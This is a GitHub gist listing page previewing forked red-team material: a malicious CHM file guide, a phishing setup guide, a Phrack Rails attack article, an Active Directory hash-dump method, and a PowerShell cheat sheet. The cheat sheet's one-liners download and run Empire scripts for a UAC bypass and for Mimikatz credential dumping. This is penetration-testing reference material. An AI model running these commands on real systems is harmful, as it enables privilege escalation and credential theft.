Skip to content

Instantly share code, notes, and snippets.

View cmdsecure's full-sized avatar

CY cmdsecure

2 followers · 10 following
View GitHub Profile
@cmdsecure
cmdsecure / Malicious-CHM-Guide.md
Created November 27, 2021 23:23 — forked from mgeeky/Malicious-CHM-Guide.md
CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
@cmdsecure
cmdsecure / RedTeam_CheatSheet.ps1
Created June 5, 2020 16:32 — forked from jivoi/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@cmdsecure
cmdsecure / Attacking Ruby on Rails Applications
Created April 27, 2020 16:14 — forked from cyberheartmi9/Attacking Ruby on Rails Applications
==Phrack Inc.==
Volume 0x0f, Issue 0x45, Phile #0x0c of 0x10
|=-----------------------------------------------------------------------=|
|=--------------=[ Attacking Ruby on Rails Applications ]=---------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ joernchen of Phenoelit ]=----------------------=|
|=---------------------=[ joernchen@phenoelit.de ]=----------------------=|
|=-----------------------------------------------------------------------=|
@cmdsecure
cmdsecure / Red Team Phishing with Gophish.md
Created October 21, 2019 09:16 — forked from ozzi-/Red Team Phishing with Gophish.md

Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as creating, perform and evaluate a phishing campaign. This is the basic lifecycle of your phishingn campaign:

+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+
@cmdsecure
cmdsecure / Active_Directory_dump_n_crack.md
Created March 8, 2019 11:10 — forked from 7MinSec/Active_Directory_dump_n_crack.md
Active Directory hash dump n' crack methodology

Creating AD backup dump of user accounts and hashes

Upgrade to latest version of PowerShell

Check your version with:

$Psversiontable.psversion

If you are below Major: 5, Minor:1 head to Microsoft's download site to get the latest.